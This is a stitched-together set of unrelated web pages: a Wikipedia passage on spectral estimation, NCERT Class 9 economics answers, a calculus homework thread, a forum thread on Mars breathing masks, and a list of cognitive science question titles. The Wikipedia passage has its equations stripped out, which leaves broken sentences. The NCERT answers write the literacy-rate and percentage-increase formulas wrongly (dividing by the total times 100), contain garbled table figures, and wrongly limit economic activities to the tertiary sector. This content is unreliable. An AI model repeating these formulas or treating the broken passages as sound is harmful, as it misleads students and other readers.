Many other techniques for spectral estimation have been developed to mitigate the disadvantages of the basic periodogram. These techniques can generally be divided into non-parametric and parametric methods. The non-parametric approaches explicitly estimate the covariance or the spectrum of the process without assuming that the process has any particular structure. Some of the most common estimators in use for basic applications (e.g. Welch's method) are non-parametric estimators closely related to the periodogram. By contrast, the parametric approaches assume that the underlying stationary stochastic process has a certain structure that can be described using a small number of parameters (for example, using an auto-regressive or moving average model). In these approaches, the task is to estimate the parameters of the model that describes the stochastic process.
Following is a partial list of non-parametric spectral density estimation techniques:
Below is a partial list of parametric techniques:
### Parametric estimation
In parametric spectral estimation, one assumes that the signal is modeled by a stationary process which has a spectral density function (SDF) that is a function of the frequency and parameters .[2] The estimation problem then becomes one of estimating these parameters.
The most common form of parametric SDF estimate uses as a model an autoregressive model of order .[2]:392 A signal sequence obeying a zero mean process satisfies the equation
where the are fixed coefficients and is a white noise process with zero mean and innovation variance . The SDF for this process is
with the sampling time interval and the Nyquist frequency.
There are a number of approaches to estimating the parameters of the process and thus the spectral density:[2]:452-453
• The Yule-Walker estimators are found by recursively solving the Yule-Walker equations for an process
• The Burg estimators are found by treating the Yule-Walker equations as a form of ordinary least squares problem. The Burg estimators are generally considered superior to the Yule-Walker estimators.[2]:452 Burg associated these with maximum entropy spectral estimation.[3]
• The forward-backward least-squares estimators treat the process as a regression problem and solves that problem using forward-backward method. They are competitive with the Burg estimators.
• The maximum likelihood estimators assume the white noise is a Gaussian process and estimates the parameters using a maximum likelihood approach. This involves a nonlinear optimization and is more complex than the first three.
Alternative parametric methods include fitting to a moving average model (MA) and to a full autoregressive moving average model (ARMA).
## Frequency estimation
Frequency estimation is the process of estimating the complex frequency components of a signal in the presence of noise given assumptions about the number of the components.[4] This contrasts with the general methods above, which do not make prior assumptions about the components.
### Finite number of tones
A typical model for a signal consists of a sum of complex exponentials in the presence of white noise,
.
The power spectral density of is composed of impulse functions in addition to the spectral density function due to noise.
The most common methods for frequency estimation involve identifying the noise subspace to extract these components. These methods are based on eigen decomposition of the autocorrelation matrix into a signal subspace and a noise subspace. After these subspaces are identified, a frequency estimation function is used to find the component frequencies from the noise subspace. The most popular methods of noise subspace based frequency estimation are Pisarenko's method, the multiple signal classification (MUSIC) method, the eigenvector method, and the minimum norm method.
,
• Eigenvector method
• Minimum norm method
### Single tone
If one only wants to estimate the single loudest frequency, one can use a pitch detection algorithm. If the dominant frequency changes over time, then the problem becomes the estimation of the instantaneous frequency as defined in the time–frequency representation. Methods for instantaneous frequency estimation include those based on the Wigner-Ville distribution and higher order ambiguity functions.[5]
If one wants to know all the (possibly complex) frequency components of a received signal (including transmitted signal and noise), one uses a discrete Fourier transform or some other Fourier-related transform.
## Example calculation
Suppose , from to is a time series (discrete time) with zero mean. Suppose that it is a sum of a finite number of periodic components (all frequencies are positive):
The variance of is, for a zero-mean function as above, given by . If these data were samples taken from an electrical signal, this would be its average power (power is energy per unit time, so it is analogous to variance if energy is analogous to the amplitude squared).
Now, for simplicity, suppose the signal extends infinitely in time, so we pass to the limit as . If the average power is bounded, which is almost always the case in reality, then the following limit exists and is the variance of the data.
Again, for simplicity, we will pass to continuous time, and assume that the signal extends infinitely in time in both directions. Then these two formulas become
and
The root mean square of is , so the variance of is . Hence, the contribution to the average power of coming from the component with frequency is . All these contributions add up to the average power of .
Then the power as a function of frequency is , and its statistical cumulative distribution function will be
is a step function, monotonically non-decreasing. Its jumps occur at the frequencies of the periodic components of , and the value of each jump is the power or variance of that component.
The variance is the covariance of the data with itself. If we now consider the same data but with a lag of , we can take the covariance of with , and define this to be the autocorrelation function of the signal (or data) :
If it exists, it is an even function of . If the average power is bounded, then exists everywhere, is finite, and is bounded by , which is the average power or variance of the data.
It can be shown that can be decomposed into periodic components with the same periods as :
This is in fact the spectral decomposition of over the different frequencies, and is related to the distribution of power of over the frequencies: the amplitude of a frequency component of is its contribution to the average power of the signal.
The power spectrum of this example is not continuous, and therefore does not have a derivative, and therefore this signal does not have a power spectral density function. In general, the power spectrum will usually be the sum of two parts: a line spectrum such as in this example, which is not continuous and does not have a density function, and a residue, which is absolutely continuous and does have a density function.
## References
1. Welch, P. D. (1967), "The use of Fast Fourier Transform for the estimation of power spectra: A method based on time averaging over short, modified periodograms", IEEE Transactions on Audio and Electroacoustics, AU-15 (2): 70–73, doi:10.1109/TAU.1967.1161901
2. Percival, Donald B.; Walden, Andrew T. (1992). Spectral Analysis for Physical Applications. Cambridge University Press. ISBN 9780521435413.
3. Burg, J.P. (1967) "Maximum Entropy Spectral Analysis", Proceedings of the 37th Meeting of the Society of Exploration Geophysicists, Oklahoma City, Oklahoma.
4. Hayes, Monson H., Statistical Digital Signal Processing and Modeling, John Wiley & Sons, Inc., 1996. ISBN 0-471-59431-8.
5. Lerga, Jonatan. "Overview of Signal Instantaneous Frequency Estimation Methods" (PDF). University of Rijeka. Retrieved 22 March 2014.
• Porat, B. (1994). Digital Processing of Random Signals: Theory & Methods. Prentice Hall. ISBN 0-13-063751-3.
• Priestley, M.B. (1991). Spectral Analysis and Time Series. Academic Press. ISBN 0-12-564922-3.
• Stoica, P.; Moses, R. (2005). Spectral Analysis of Signals. Prentice Hall. ISBN 0-13-113956-8.
• Thomson, D. J. (1982). "Spectrum estimation and harmonic analysis". Proceedings of the IEEE. 70 (9): 1055. doi:10.1109/PROC.1982.12433.
This article is issued from Wikipedia - version of the 11/30/2016. The text is available under the Creative Commons Attribution/Share Alike but additional terms may apply for the media files.
|
# NCERT Solutions for Class 9 Social Science Economics Chapter 2 People as Resource
These NCERT Solutions for Class 9 Social Science Economics Chapter 2 People as Resource Questions and Answers are prepared by our highly skilled subject experts to help students while preparing for their exams.
## People as Resource NCERT Solutions for Class 9 Social Science Economics Chapter 2
### Class 9 Economics Chapter 2 People as Resource InText Questions and Answers
Lets’s Discuss, NCERT Textbook Page 17
Question 1.
Looking at the photograph can you explain how a doctor, a teacher, engineer, and a tailor are an asset to the economy?
These people provide different services to the people of the country. A doctor treats the patients, a teacher gives education to the children and plays a valuable role in moulding them into good citizens, an engineer, a tailor, and many other people in different professions serve the society and the country in their own way. Therefore, they are an asset to the economy of the nation.
Lets’s Discuss, NCERT Textbook Page 18
Question 2.
Do you notice any difference between the two friends? What are those?
Story of Sakal
There were two friends Vilas and Sakal living in the same village Semapur. Sakal was a twelve-year-old boy. His mother Sheela looked after domestic chores. His father Buta Chaudhary worked in an agricultural field. Sakal helped his mother with domestic chores. He also looked after his younger brother Jeetu and sister Seetu. His uncle Shyam had passed the matriculation examination, but, was sitting idle in the house as he had no job. Buta and Sheela were eager to teach Sakal. They forced him to join the village school which he soon joined.
He started studying and completed his higher secondary examination. His father persuaded him to continue his studies. He raised a loan for Sakal to study a vocational course in computers. Sakal was meritorious and interested in studies from the beginning. With great vigour and enthusiasm, he completed his course. After some time he got a job in a private firm. He even designed a new kind of software. This software helped him increase the sale of the firm. His boss acknowledged his services and rewarded him with a promotion.
Story of Vilas
Vilas was an eleven-year-old boy residing in the same village as Sakal. Vilas’s father Mahesh was a fisherman. His father passed away when he was only two years old. His mother Geeta sold fish to earn money to feed the family. She bought fish from the landowner’s pond and sold it in the nearby mandi. She could earn only Rs 150 a day by selling fish. Vilas became a patient of arthritis. His mother could not afford to take him to the doctor. He could not go to school either. He was not interested in studies. He helped his mother in cooking and also looked after his younger brother Mohan. After some time his mother fell sick and there was no one to look after her. There was no one in the family to support them. Vilas, too, was forced to sell fish in the same village. He like his mother earned only a meager income.
• Vilas had lost his father at his early age whereas Sakai was living with his parents.
• Sakai was interested in studies and went to school but Vilas was too poor to go to school.
• Sakai completed a course in computers and got a nice job in a private firm whereas Vilas remained illiterate and so never got any proper employment. He sold fish in the village market and earned a meager income.
• Since Sakai earned a good income, he was able to improve his family’s condition but Vilas could not do so. He and his family were bound to live in extreme poverty.
Lets’s Discuss, NCERT Textbook Page 21
Question 3.
Study the graph given below and answer the following questions:
Source: Economic Survey, 2012.
1. Has the literacy rates of the population increased since 1951?
2. In which year India has the highest literacy rates?
3. Why literacy rate is high among the males of India?
4. Why are women less educated than men?
5. How would you calculate literacy in India?
1. Yes, the literacy rates of the population have increased since 1951. It was 18% in 1951. The figure rose to 74% in 2010-2011.
2. India has the highest literacy rate in 2011.
3. It is because, in our country, men’s education is considered more important than women’s.
4. India is a country where males dominate. They are given all privileges and are always seen at the forefront. Hence, their education is considered of utmost importance whereas women’s education is undermined. This is the reason why women are less educated than men.
5. The literacy rate can be calculated on the basis of the number of literate people divided by the population multiplied by 100. This formula is expressed in the following way;
Literacy Rate = $$\frac{\text { Number of literate people in India }}{\text { Population of India } \times 100}$$
6. India’s literacy rate would be 80% by 2020.
Lets’s Discuss, NCERT Textbook Page 23
Question 4.
Discuss this table given below in the classroom and answer the following questions.
1. Is the increase in the number of colleges adequate to admit the increasing number of students?
2. Do you think we should have more Universities?
3. What is the increase noticed among the teachers in the year 1998-99?
Table 1: Number of Institutions of Higher Education, Enrolment and Faculty
Year Number of Colleges Number of Universities Students Teachers 1950-51 750 30 2,63,000 24,000 1990-91 7,346 177 49,25,000 2,72,000 1996-97 9,703 214 67,55,000 3,21,000 1998-99 11,089 238 74,17,000 3,42,000 2007-08 18,064 378 14,00,000 4,92,000 2011-12 31,324 611 – – 2012-13 37,204 723 28,00,00 –
Source: UGC Annual Report 1996-97 and 1998-99 and Selected Educational Statistics, Ministry of HRD, Draft Report of Higher Educational for 11th Five Year Plan, the working group on Economic Survey 2011-12, 2012-13.
1. No, the increase in the number of colleges is not adequate to admit the increasing number of students because the number of students is increasing at a faster rate compared to the colleges being established in the country.
2. Yes, there should have more Universities to keep pace with the increasing number of students.
3. There was an increase of 21 thousand teachers in the year 1998-99 compared to 1996-97.
4. Future Colleges and Universities should focus on increasing access, quality, adoption of state-specific curriculum modification, vocationalisation, and networking on the use of information technology.
Lets’s Discuss, NCERT Textbook Page 23
Question 5.
Study the table given below and answer the following questions:
Table 2: Health infrastructure over the years
1. What is the percentage increase in dispensaries from 1951 to 2011?
2. What is the percentage increase in doctors and nursing personnel from 1951 to 2011?
3. Do you think the increase in the number of doctors and nurses is adequate for India? If not, why?
4. What other facilities would you like to provide in a hospital?
5. Discuss the hospital you have visited.
6. Can you draw a graph using this table?
1. The percentage increase in dispensaries and hospitals from 1951 to 2011 is = $$\frac{28472-9201}{9201 \times 100}$$ = 209.17%
2. The percentage increase in doctors from 1951 to 2011 is = $$\frac{816629-61800}{61800 \times 100}$$ = 1221.40%
The percentage increase in nursing personnel from 1951 to 2011 is = $$\frac{1702555-18054}{18054 \times 100}$$ = 9330.34%
3. For a country like India where the population is so huge, the increase in the number of doctors and nurses is not adequate. We need more number of them.
4. Facilities that should be provided in a hospital are:
• Hospitals should be neat and clean.
• Doctors should be available 24 hours.
• Emergency wards should be made more efficient.
• Poor patients should be given treatment at a subsidized rate.
• At least one ATM should be there in every hospital.
• Chemist shops should also be available in hospitals.
5. Recently I visited Max Super Speciality Hospital located in Vaishali, Ghaziabad. It is India’s first truly integrated healthcare system, providing three levels of clinical service e.g. primary, secondary, and tertiary within one system. It has all the features of a world-class hospital. It has a team of highly qualified and trained doctors, nurses, and patient care personnel to provide the highest standard of care. This hospital is equipped with the latest medical equipment. Great care is taken on cleanliness. It has fully computerized health records. 24-hour chemist, ambulance, patient diagnostic, and emergency services are available here. The hospital is centrally air-conditioned.
### Class 9 Economics Chapter 2 People as Resource Textbook Questions and Answers
Question 1.
What do you understand by ‘people as a resource?
‘People as a resource’ is a way of referring to a country’s working people in terms of their existing productive skills and abilities. If we look at the population from a productive aspect, it emphasizes its ability to contribute to the creation of the Gross National Product. Like other resources population also is a resource—which is called a human resource. When the existing human resource is further developed by becoming more educated and healthy, we call it human capital formation that adds to the productive power of the country.
Question 2.
How are human resources different from other resources like land and physical capital?
Human resource is different from other resources in the following ways:
• Human capital is in one way superior to other resources like land and physical capital. Human resources can make use of land and capital. Land and capital cannot become useful on their own.
• Human resources need investment through education, training, and medical care, etc. to develop. On the other hand, land and physical capital need money and physical inputs to develop.
• Land and physical capital are useless without human resources. Thus we can say that human resource is the most important resource because it helps to utilize natural resources.
Question 3.
What is the role of education in human capital formation?
Education plays a very significant role in human capital formation. It is an important input for the growth of an individual. It enables humans to realize their full potential and achieve success in life in the form of higher incomes through better jobs and higher productivity. Education helps individuals to make better use of the economic opportunities available before them.
Education and skill are the major determinants of the earning of any individual in the market. We have seen that a majority of women are paid low compared to men because they have meager education and skill formation. But women with high education and skill formation are paid at par with the men. So, education is important and it should be imparted to children with great care.
Question 4.
What is the role of health in human capital formation?
Not only education but health also plays a vital role in human capital formation. The health of a person helps him to realize his potential and the ability to fight illness. A healthy person can do the work in a more effective manner. He or she can contribute to the growth and development of the economy by doing productive work. On the contrary, an unhealthy person becomes a liability for the family and society. So health is an indispensable basis for realizing one’s well-being. Our government has been very serious on this point. The improvement in the health status of the population has been the priority of the country.
Question 5.
What part does health play in the individual’s working life?
An individual’s working life is directly associated with his or her health. If he or she is healthy, he or she will work enthusiastically and efficiently. If not, doing work will be a burden for him or her. In that case, no firm or organization will induce to employ him or her. So health should be given priority because only a healthy person can become an asset to society and the nation.
Question 6.
What are the various activities are undertaken in the primary sector, secondary sector, and tertiary sector?
The various activities have been classified into three main sectors i.e., primary, secondary, and tertiary.
• The primary sector includes agriculture, forestry, animal husbandry, fishing, poultry farming, mining, and quarrying.
• Manufacturing is included in the secondary sector.
• Trade, transport, communication, banking, education, health, tourism, services, insurance, etc. are included in the tertiary sector.
Question 7.
What is the difference between economic activities and non-economic activities?
Economic activities: Activities that come under the tertiary sector result in the production of goods and services. These activities add value to the national income and are called economic activities. These activities involve remuneration or money.
Non-economic activities: These activities are not performed for money and so do not add value to the national income. In fact, these activities are performed for self-consumption or to satisfy emotional needs.
Question 8.
Why are women employed in low-paid work?
• A majority of women have meager education and low skill formation. This is the main reason why they are paid low compared to men.
• Less education means less awareness as a result of which most of the women work in the unorganized sector and face job insecurity and earn a meager income.
• In our male-dominated society, women are considered physically inferior and therefore they are paid less than men for the same work.
Question 9.
How will you explain the term unemployment?
The state of being without any work both for an educated and uneducated person, for earning one’s livelihood is meant by unemployment. Unemployment is said to exist when people who are willing to work at the going wages cannot final jobs.
Question 10.
What is the difference between disguised unemployment and seasonal unemployment?
The difference between disguised unemployment and seasonal unemployment is given below:
Seasonal Unemployment Disguised Unemployment I. Seasonal unemployment happens when people are not able to find a job during some months of the year. People dependent upon agriculture usually face this problem. I. In the case of disguised unemployment people appear to be employed. This usually happens among family members engaged in agricultural activities. II. There is certain busy seasons when sowing, harvesting, weeding, and threshing is done. But when plants are growing, there is not much work. II. Sometimes in agricultural families, eight people are working on the farm. Whereas only five people are needed to do the work. Thus, three persons are surplus and they are not needed on the farm. They also do not help to increase the production of the farm. III. During this period, they remain unemployed and are said to be seasonally unemployed. III. If these extra persons are removed from the farm, the production will not be affected, These three persons appear to be employed but are actually disguisedly unemployed.
Question 11.
Why is educated unemployed, a peculiar problem of India?
• Educated unemployment has become a common problem in urban areas. Many youths with matriculation, graduation, and post-graduation degrees are not able to find jobs.
• A study showed that unemployment of graduates and post-graduate has increased faster than among matriculates. This is really a peculiar phenomenon.
• A paradoxical manpower situation is witnessed as a surplus of manpower in certain categories coexists with a shortage of manpower in others.
• There is unemployment among technically qualified people on one hand, while there is a dearth of technical skills for economic growth. Educated unemployment is, thus, a peculiar problem in India.
Question 12.
In which field do you think India can build the maximum employment opportunity?
India can build the maximum employment opportunity in the tertiary sector, also called the service sector. This sector in India employs many different kinds of people. There are a number of services such as biotechnology, information technology, etc. that employ highly skilled and educated workers. At the same time, there are a very large number of workers engaged in services such as small shopkeepers, repairpersons, transport persons, etc.
Question 13.
Can you suggest some measures in the education system to mitigate the problem of the educated unemployment?
In order to mitigate the problem of the educated unemployed, the following measures can be suggested:
• The focus should be given to increasing access, quality, adoption of states-specific curriculum modification, vocationalisation, and networking on the use of information technology.
• There should be a focus on distant education, the convergence of formal, non-formal, distant, and IT education institutions.
• More opportunities should be made available in the service sector such as biotechnology, information technology, etc. so that educated unemployed can find jobs easily.
• The number of universities and institutions of higher learning in specialized areas should be increased in order to increase the enrolment of students. At the same time recruitment of teachers should also be increased.
Question 14.
Can you imagine some village that initially had no job opportunities but later came up with many?
1. Ratanpura was a very backward village a few decades ago. The only occupation of the villagers was agriculture which was dependent on rainfall. If rainfall was sufficient, there was no problem but if it was poor, the villagers would face problems because there were no other job opportunities.
2. Then electricity came there which changed the system of irrigation. People could now irrigate much larger areas more effectively with the help of electric-run tube wells. They could now grow more than one crop in a year and get work almost all the year.
3. By and by small-scale industries were set up which opened the door of employment. These industries provided both skilled and unskilled jobs to the village people.
4. With the passage of time people became aware of education and acknowledged the government for the need for schools in the village. The government set up a primary and a secondary school where village people got an education which ultimately enabled them to find jobs outside the village.
5. Then computer centers were set up which opened the door of vocational courses to the young enthusiastic villagers. These villagers after completing the course got jobs in private firms.
Question 15.
Which capital would you consider the best—land, labour, physical capital, and human capital? Why?
|
# Paritial derivative.
## Homework Statement
Verify if ##t=\lambda x## then ##x^2\frac{\partial^2 y}{\partial x^2} = t^2\frac{\partial^2 y}{\partial t^2}##
## The Attempt at a Solution
$$t=\lambda x\;\Rightarrow\; \frac{\partial t}{\partial x}=\lambda$$
$$\frac{\partial y}{\partial x} = \frac{\partial y}{\partial t}\frac{\partial t}{\partial x}= \lambda\;\frac{\partial y}{\partial t}$$
$$\frac{\partial^2 y}{\partial x^2}=\lambda \frac{\partial^2 y}{\partial t^2} \frac{\partial t}{\partial x}=\lambda^2\frac{\partial^2 y}{\partial t^2}$$
$$x^2\frac{\partial^2 y}{\partial x^2}=\frac{t^2}{\lambda^2}\lambda^2\frac{\partial^2 y}{\partial t^2}\;\Rightarrow\;x^2\frac{\partial^2 y}{\partial x^2} = t^2\frac{\partial^2 y}{\partial t^2}$$
Am I correct?
Thanks
arildno
Homework Helper
Gold Member
Dearly Missed
Yes, with just a minor quibble:
"t" is only dependent on "x", and not in addition dependent on other variables.
Thus, you should use dt/dx, rather than the symbol for the partial derivative here.
HallsofIvy
Homework Helper
Your differential equation has dependent variable "y" so it makes no sense to ask if "$t= \lambda x$" satisfies the equation.
I suspect you are asked to show that $f(t-\lambda x)$ satisfies the equation for f any twice differentiable function of a single variable.
arildno
Homework Helper
Gold Member
Dearly Missed
I don't agree HallsofIvy. Here, it is about how a simple linear scaling will affect the shape of a particular derivative from the "unscaled" x as independent variable, to its shape in its "scaled" variable "t". That is, we are dealing with the correct IDENTITY, not an equation!! It is not about an "equation" as such, but meant as an intermediate step in transforming an equation from the "x"-formulation to its logically equivalent "t"-formulation.
TECHNICALLY, we are looking at the relation between the shapes of the derivatives of functions y and Y, respectively, fulfilling the relation
y(x,....)=Y(t(x),...)
making an abuse of notation with replacing "Y" with "y" everywhere.
Last edited:
Thanks everyone. I meant exactly what I asked, it's only about the steps to perform the differential equation.
|
Gas filter mask on Mars - sci fi
Gold Member
Summary:
In Kim Stanley Robinson's Mars Series, they had gas masks that preferentially let oxygen through. Can that work?
Main Question or Discussion Point
In the early parts of the books, Mars' ambient atmo pressure (and temperature) was increased, including not just CO2, but oxygen as well.
It rose to the point where they only needed masks that let through oxygen but not CO2.
In my amateur view, I would expect that this would not work very well. I see the partial pressure of oxygen entering the mask as being insufficient for breathing - they would be gasping for air and sucking deeply with every breath just to get oxygen.
Of course, it would be very dependent on the ambient atmo pressure and the concentration of oxygen...
Let's assume the masks are passive, not actively taking in oxygen and pressurizing it.
(While this is couched in a sci-fi story, the physics is real - and could conceivably work today for high altitudes - so i figure this is a more appropriate forum than Sci-Fi.)
Related Biology and Medical News on Phys.org
BillTre
Gold Member
In theory, you could filter at a molecular level of fineness and only pass molecules of some particular size. If oxygen is the smallest size molecule, that could work. However, the membrane would be like a membrane in a reverse osmosis machine or membranes used in dialysis. The resistance to flow/surface area would be large. RO machines often use pumps to push water through their membranes.
An alternative could be sending the air through soemthing like a resin that binds all the molecules you don't want. This would be a larger device, but with lower flow resistance. The filter material would get saturated however and would have to be replaced or treated to dump the bound molecules before it would be useful again.
Gold Member
That's all good to know.
To me, it seems as simple as: with only a partial pressure of oxygen at the face mask, and full ambient pressure on the body (i.e. lungs), a person would have to struggle to inhale - like trying to use a hollow reed to breathe at the bottom of a pond.
Correct. Unless there's some kind of inert gas circulated within the breather to equalize the pressure like in some types of diving or similar breathing devices, the breathing capacity will be limited by the tolerance of muscles involved.
Gold Member
Correct. Unless there's some kind of inert gas circulated within the breather to equalize the pressure like in some types of diving or similar breathing devices,
I am not sure I see how this would work.
the breathing capacity will be limited by the tolerance of muscles involved.
If you transpose this from abstract to practical, ie. by imagining what it would be like to use such a device, I think anyone would categorize it as non-viable except as an emergency device. No device that makes you feel like you're sucking vacuum would be tolerable for more than a few minutes.
am not sure I see how this would work
Think of it as a special type of rebreather where the oxygen supply comes by filtering the 'air'.
jim mcnamara
Mentor
During cold periods on Mars the surface temperature would require a human to have 100% "coverage". So why try to create a mask in addition to whatever shield you have against the cold.
The predication for this thread is kind of weird, the topic of partial pressure enhancement itself is first rate. I'm not sure where the thread should be.
Do not neglect thermodynamics - it will require substantial energy to increase the partial pressure of any one gas in the Martian atmosphere up to something compatible with Earth life. There is no free lunch on this one.
Low partial pressures of $O_2$ will suck oxygen out of the pulmonary system otherwise.
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6420699/
jim mcnamara
Mentor
PS: Very low $PCO_2$ levels also affect the pulmonary system, too. Our pulmonary system evolved on Earth for ±300 million years, so there are lots of gotchas going to other planets
Gold Member
What about positioning the filter at the intake of an air compressor?
See OP:
Let's assume the masks are passive, not actively taking in oxygen and pressurizing it.
See OP:
Well that's embarrassing. Thanks for pointing that out.
|
# All Questions
137 views
### Are there any cognitive models for image interpretation?
Are there any cognitive models which can be used for image interpretation. I have tried to find some specific models which can be used for image interpretation but have not been able to find any ...
27 views
### Technical term for the loss of words in your mother-tongue when speaking a different language
I am basically looking for two words which are, though, related to some degree. It might even be that ultimately the same word is the answer to both parts of this question. I split them up into two ...
12 views
### Is it possible to devise a scientifically valid model for personality preferences or tendencies? [duplicate]
I have been interested in preferences, personality types and related topics for about two years, mainly as a by-product of a personal introspection process. For a long while, I have been quite ...
209 views
### Why do people suddenly look back if you look at them for a while?
You possibly are familiar with the following situation, I do not know if this is a researched phenomena or not however. You look straight at somebody for some time and suddenly, even though he or she ...
35 views
### How exactly men recoqnize others' IQ by just looking at the picture? [closed]
http://www.policymic.com/articles/86593/you-can-predict-this-man-s-iq-just-by-looking-at-his-picture?utm_source=policymicFB&utm_medium=main&utm_campaign=social Claims that humans can ...
23 views
### How to select vocabulary items for a test designed to expand vocabulary in English as a second language students?
I am developing a personalized android program designed to expand vocabulary for students learning English as a second language. It includes "story-reading" and "Word-Meaning Quizes". First, ...
33 views
### What is the relationship between topographic maps and sensory memory?
Sensory maps are defined functionally: they exist for a certain time window, are overwritten quickly, are generally inaccessible to introspective control. Topographic maps are defined biologically: ...
19 views
### What makes a sight or an image mesmerizing and irresistible?
There are some examples of this. What makes us: Feel we just HAVE TO watch that video or an image again, it's common with comedy videos Feel we need to stare at a such a beautiful sight, a person ...
32 views
### What is the actual name of the condition where one has the absolute desire to be in a group?
Is the following a medical condition by itself, and if so what is could be its name? If not, how can it be described? There are 3 groups in a set of people (...
5k views
### Is leg jiggling a focus aid?
This is slightly left-field, but I am interested in the Cognitive Science implications of this question: Many people, myself included, are "leg jigglers", meaning we often sit jiggling or bouncing a ...
327 views
### Have humans always had problems with motivation and laziness?
I originally wanted to ask a question "Is there a drug for motivation or laziness", but google search revealed that people have been asking this question for years and there's no drug that is ...
20 views
### How exactly are socionics and MBTI different?
Socionics superficially looks exactly as MBTI. 8 functions, 16 personality types. There's even a table, perfectly corresponding socionics types with MBTI types. Then what makes socionics and MBTI ...
19 views
### Where to obtain full set of IPIP items on the internet?
I heard that IPIP project consists of 2600 public domain questions. Where I can find download those questions? Is there any web address?
15 views
### Are there lying or social desirability items in IPIP pool?
Are there any lie or social desirable questions in the IPIP pool of 2600 question? Can I construct psychometrically such a scale if it does not exists by default?
45 views
### Are there studies on international differences on sexualization?
With sexualization, I mean the reaction that one has when seeing the desired sexual object. I guess that in some countries, their cultures may have softer reactions, while in others, a stronger ...
4k views
### Free online intelligence test with norm table, high reliability, and must be printable?
I am looking for a general intelligence test which meets the following requirements: available online for free there is a table which translates "points" to IQ (I don't want a hidden online ...
17 views
### Vivid dreams by electric shocks?
what told me in a comment, that of course anything that will disturb your sleep but not quite wake you will induce vivid dreams, because vivid dreams happen in the shallow sleep phases. I agree, ...
25 views
### Need a definition of Cognitive Simplicity (or Complexity) that would appeal to a wide audience
Everyone in my organization wants to make our products & website as simple as possible for our customers. My concern is that "simple" means different things to different people. I'm looking for a ...
90 views
### Is there psychological research on seduction?
I've been reading a lot of books about seduction. Most of them rely on (approximative) psychological basis and presents really interesting insights. Robert Greene - Art of seduction, for example ...
22 views
### Is the book “The Cambridge Handbook of Expertise and Expert Performance” worth reading?
I do not know whether this is the most appropriate place to post this question, but since the book is related to psychology, I will post it here. If there is a more appropriate place to ask this ...
43 views
### Technical term for the temporary loss of understanding a word
I am basically looking for two words which are related to some degree. Ultimately the same word might even be the answer to both parts of this question. I split them up into two questions (see also ...
37 views
### Why do I get smaller accuracy when I use 80% of training sets using HMAX model?
I am trying to compute the accuracy of the HMAX model. I am using the Face category (containing 435 images) from the Caltech101 database. I split it into $x$ ...
35 views
### What brain regions are activated when a dream is remembered?
Some people remember dreams, others don't. The same person can wake up with dream recall one day and without on other days. I know that the association between REM sleep and dreaming was initially ...
103 views
### Affective Neuroscience Personality Scales
I wonder if anybody could give some details about Affective Neuroscience Personality Scales. I tried to access 'The Affective Neuroscience Personality Scales: Normative Data and Implications' by ...
37 views
### Terminology for when a person starts to like something they previously didn't like due to exposure from a friend
What is the term for when a person starts to like something they previously didn't like due to exposure from a friend? What is the term for such phenomenon in social psychology? For example, I don't ...
29 views
### Forehead tingling due to nearby location of object
I have often experienced a tingling in the center of my forehead when aware of the presence of a nearby potentially dangerous object. This illusory sensation is likely a mental projection since it ...
28 views
### How does the brain know whether or not it comprehends a novel concept?
There seem to be at least two kinds of confusion regarding novel concepts. In one, the brain simply can't form an abstract model from whatever information is being presented. It's where you can't ...
58 views
### Is it possible to permanently improve long-term memory?
Many similar questions here ask either about working or short-term memory, or about various tricks and techniques to efficiently remember information. My question is, is it possible to improve the ...
25 views
### How long could Henry Molaison keep his memory of the present?
I'm talking about Henry Molaison (HM), the famous memory research patient. I hear that he could converse normally with a researcher until he "got distracted", at which point he no longer remembered ...
184 views
### .Do students learn better when challenged (specifically, in math education)?
Originally posted on Math.SE, but it was suggested cogsci.SE would be a more suitable venue. I'm aware of two publications that have trickled onto the radar screens of non-specialists: Fortune ...
50 views
### Super polymath feasibility: Is it possible to have the highest intellectual ability in every area?
Could a single individual have the abilities of Gauss in mathematics, play soccer like Messi, write like Dostoyevsky, play chess like Carlsen, have ideas in physics comparable to those of Einstein, ...
8 views
### Are there any recorded cases of hearing the outside world while in a coma?
There are plenty of stories flying around of people having been in a coma, but able to hear the outside world. They usually include either hearing malicious things said by staff, or encouragement by ...
71 views
### Do introverts tend to experience more psychological problems?
Are there any evidence suggesting that the more introvert people could be more subject to psychological problems? Is possible to hypothesize that one of the causes is the lack of ideas in comparison ...
63 views
### Are there scientific alternatives to Neuro-Linguistic Programming (NLP)?
According to these answers 1, 2 and to wikipedia, NLP seems to be a pseudoscience, which has shown no real effectiveness, and so on. Are there scientific proved alternatives to NLP?
41 views
### Which are the most accredited tests for measuring personality traits?
I'm lacking of an academic background. I thought there were only 4 or 16 personality traits. But a fast search on google is showing a huge number: according to this link they should be 638. Is this ...
19 views
### Where to find statistical prevalence data for psychopathology over time?
Are there any places where is possible to find historical data for trends of psychological disease? For example some Google website (similar to google trends or NGrams)
20 views
### Are antidepressants and anxiolytics helping cognitive restructuring?
After some anxious attack it's common a prescription of antidepressants, anxiolytics and psychotherapy. In case of cognitive-comportamental therapy is the usage of this pharmacological device making ...
26 views
### Is psychology already using machine learning, neural network and data-mining?
For who doesn't know the concepts presented by machine learning, neural network, data-mining or artificial intelligence techniques 20 Question can be a nice point to start from. It's a website ...
22 views
### What are the effects of antipsychotic medication on brain volume?
I have read numerous different papers each claiming that antipsychotic medication either helps maintain brain volume or causes brain volume reduction in patients with schizophrenia and other psychotic ...
32 views
### How is “mislabeling” cognitive distortion different from “labeling”?
David Burns in his book Feeling Good describes "labeling and mislabeling" cognitive distortions: Personal labeling means creating a completely negative self-image based on your errors. It is an ...
21 views
### Would a patient benefit from continuing psychotherapy even after solving his pathology?
According to this question: Would most people benefit from psychotherapy? most people would benefit from psychotherapy. I'm trying to narrow that question to only the people which have experienced ...
19 views
### Is Allen Carr's Easyway a form of cognitive therapy?
David Burns is a cognitive therapist, who in his Feeling Good describes how to overcome depression. He states that depression is a logical result of irrational negative thoughts, which can be ...
8 views
### Research: Tendency to “follow” versus “self-expression”
I am trying to research attitude towards task completion and tendency between "follow" and "self-expression". But, as you can see, I am not hitting to correct keywords to get the results I want. The ...
20 views
The following self-help books are giving some advice. The first book for having friends, reach success, reach friend approval and so on. The second for avoiding nevrosis and living better in the ...
92 views
### Where does Freud say, “The unconscious mind can only wish?”
Where does Freud say, "The unconscious mind can only wish?" I've been tasked with either agreeing or disagreeing with this statement, but I cannot find exactly where Freud is said to have made this ...
91 views
### What personality traits does sexy and revealing clothing correlate with?
Is there some unifying characteristic that distinguishes women who wear form-fitting, lowcut, see-through and other kinds of revealing outfits? Are they more extroverted, do they rate higher in ...
27 views
### Is pacemaker action potential considered a calcium dependent or sodium/calcium dependent?
